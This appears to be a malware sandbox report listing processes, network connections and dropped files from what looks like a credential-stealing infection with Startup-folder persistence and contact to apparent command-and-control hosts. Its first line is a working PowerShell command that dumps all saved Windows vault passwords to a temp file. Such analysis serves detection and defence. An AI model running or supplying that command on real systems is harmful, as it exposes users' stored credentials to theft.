"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -command [void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime] $vault = New-Object Windows.Security.Credentials.PasswordVault $vault.RetrieveAll() | % { $_.RetrievePassword();$_ } > "C:\Users\Admin\AppData\Local\Temp\tmp.txt"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cd "C:\Users\Admin\AppData\Roaming\wshsdk" && C:\Users\Admin\AppData\Roaming\wshsdk\python.exe C:\Users\Admin\AppData\Roaming\rundll > "C:\Users\Admin\AppData\Roaming\wshout"
C:\Users\Admin\AppData\Roaming\wshsdk\python.exe
C:\Users\Admin\AppData\Roaming\wshsdk\python.exe C:\Users\Admin\AppData\Roaming\rundll
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cd "C:\Users\Admin\AppData\Roaming\wshsdk" && C:\Users\Admin\AppData\Roaming\wshsdk\python.exe C:\Users\Admin\AppData\Roaming\rundll > "C:\Users\Admin\AppData\Roaming\wshout"
C:\Users\Admin\AppData\Roaming\wshsdk\python.exe
C:\Users\Admin\AppData\Roaming\wshsdk\python.exe C:\Users\Admin\AppData\Roaming\rundll
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM cmdc.exe
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM cmdc.exe
C:\Users\Admin\AppData\Roaming\cmdc.exe
"C:\Users\Admin\AppData\Roaming\cmdc.exe" /stext C:\Users\Admin\AppData\Roaming\cmdc.exedata
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c mkdir "C:\Users\Admin\AppData\Roaming\wshlogs"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 72.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| BG | 2.59.254.111:2420 | 2.59.254.111 | tcp |
| US | 8.8.8.8:53 | 254.22.238.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 111.254.59.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | wshsoft.company | udp |
| SG | 194.59.164.67:80 | wshsoft.company | tcp |
| US | 8.8.8.8:53 | 67.164.59.194.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.202.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.3.197.209.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Roaming\Sdk283724711.js
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sdk283724711.js
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3zxyma4t.0k5.ps1
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
C:\Users\Admin\AppData\Roaming\wshsdk.zip
C:\Users\Admin\AppData\Roaming\wshsdk\Lib\site-packages\adodbapi\test\is64bit.py
C:\Users\Admin\AppData\Local\Temp\tmp.txt
C:\Users\Admin\AppData\Roaming\wshsdk\python.exe
C:\Users\Admin\AppData\Roaming\wshsdk\python37.dll
C:\Users\Admin\AppData\Roaming\wshsdk\vcruntime140.dll
C:\Users\Admin\AppData\Roaming\wshsdk\lib\encodings\__init__.py
C:\Users\Admin\AppData\Roaming\wshsdk\lib\encodings\__pycache__\__init__.cpython-37.pyc
C:\Users\Admin\AppData\Roaming\wshsdk\lib\codecs.py
C:\Users\Admin\AppData\Roaming\wshsdk\lib\__pycache__\codecs.cpython-37.pyc
C:\Users\Admin\AppData\Roaming\wshsdk\lib\encodings\__pycache__\aliases.cpython-37.pyc
C:\Users\Admin\AppData\Roaming\wshsdk\lib\encodings\__pycache__\latin_1.cpython-37.pyc
C:\Users\Admin\AppData\Roaming\wshsdk\lib\__pycache__\io.cpython-37.pyc
C:\Users\Admin\AppData\Roaming\wshsdk\lib\__pycache__\abc.cpython-37.pyc
C:\Users\Admin\AppData\Roaming\wshsdk\lib\encodings\ascii.py
C:\Users\Admin\AppData\Roaming\wshsdk\lib\abc.py
C:\Users\Admin\AppData\Roaming\wshsdk\lib\io.py
C:\Users\Admin\AppData\Roaming\wshsdk\lib\encodings\latin_1.py
C:\Users\Admin\AppData\Roaming\wshsdk\lib\__pycache__\site.cpython-37.pyc
C:\Users\Admin\AppData\Roaming\wshsdk\lib\__pycache__\os.cpython-37.pyc
C:\Users\Admin\AppData\Roaming\wshsdk\lib\os.py
C:\Users\Admin\AppData\Roaming\wshsdk\lib\site.py
C:\Users\Admin\AppData\Roaming\wshsdk\lib\encodings\__pycache__\ascii.cpython-37.pyc
C:\Users\Admin\AppData\Roaming\wshsdk\lib\encodings\__pycache__\utf_8.cpython-37.pyc
C:\Users\Admin\AppData\Roaming\wshsdk\lib\encodings\utf_8.py
C:\Users\Admin\AppData\Roaming\wshsdk\lib\encodings\aliases.py
C:\Users\Admin\AppData\Roaming\wshsdk\lib\__pycache__\_collections_abc.cpython-37.pyc
C:\Users\Admin\AppData\Roaming\wshsdk\lib\_collections_abc.py
C:\Users\Admin\AppData\Roaming\wshsdk\lib\__pycache__\genericpath.cpython-37.pyc
C:\Users\Admin\AppData\Roaming\wshsdk\lib\genericpath.py
C:\Users\Admin\AppData\Roaming\wshsdk\lib\__pycache__\ntpath.cpython-37.pyc
C:\Users\Admin\AppData\Roaming\wshsdk\lib\ntpath.py
C:\Users\Admin\AppData\Roaming\wshsdk\lib\__pycache__\stat.cpython-37.pyc
C:\Users\Admin\AppData\Roaming\wshsdk\lib\stat.py
C:\Users\Admin\AppData\Roaming\wshsdk\lib\__pycache__\_sitebuiltins.cpython-37.pyc
C:\Users\Admin\AppData\Roaming\wshsdk\lib\_sitebuiltins.py
C:\Users\Admin\AppData\Roaming\rundll
C:\Users\Admin\AppData\Roaming\wshsdk\lib\site-packages\pywin32.pth
C:\Users\Admin\AppData\Roaming\wshsdk\lib\sqlite3\__init__.py
C:\Users\Admin\AppData\Roaming\wshsdk\lib\sqlite3\__pycache__\__init__.cpython-37.pyc
C:\Users\Admin\AppData\Roaming\wshsdk\lib\__pycache__\datetime.cpython-37.pyc
C:\Users\Admin\AppData\Roaming\wshsdk\lib\datetime.py
C:\Users\Admin\AppData\Roaming\wshsdk\lib\sqlite3\__pycache__\dbapi2.cpython-37.pyc
C:\Users\Admin\AppData\Roaming\wshsdk\lib\sqlite3\dbapi2.py
C:\Users\Admin\AppData\Roaming\wshsdk\lib\collections\__pycache__\__init__.cpython-37.pyc
C:\Users\Admin\AppData\Roaming\wshsdk\lib\collections\__init__.py
C:\Users\Admin\AppData\Roaming\wshsdk\lib\__pycache__\reprlib.cpython-37.pyc
C:\Users\Admin\AppData\Roaming\wshsdk\lib\reprlib.py
C:\Users\Admin\AppData\Roaming\wshsdk\lib\__pycache__\heapq.cpython-37.pyc
C:\Users\Admin\AppData\Roaming\wshsdk\lib\heapq.py
C:\Users\Admin\AppData\Roaming\wshsdk\lib\keyword.py
C:\Users\Admin\AppData\Roaming\wshsdk\lib\operator.py
C:\Users\Admin\AppData\Roaming\wshsdk\lib\__pycache__\keyword.cpython-37.pyc
C:\Users\Admin\AppData\Roaming\wshsdk\lib\__pycache__\operator.cpython-37.pyc
C:\Users\Admin\AppData\Roaming\wshsdk\lib\collections\__pycache__\abc.cpython-37.pyc
C:\Users\Admin\AppData\Roaming\wshsdk\lib\collections\abc.py
C:\Users\Admin\AppData\Roaming\wshsdk\DLLs\_sqlite3.pyd
C:\Users\Admin\AppData\Roaming\wshsdk\python3.dll
C:\Users\Admin\AppData\Roaming\cmdc.exe.zip
C:\Users\Admin\AppData\Roaming\cmdc.exe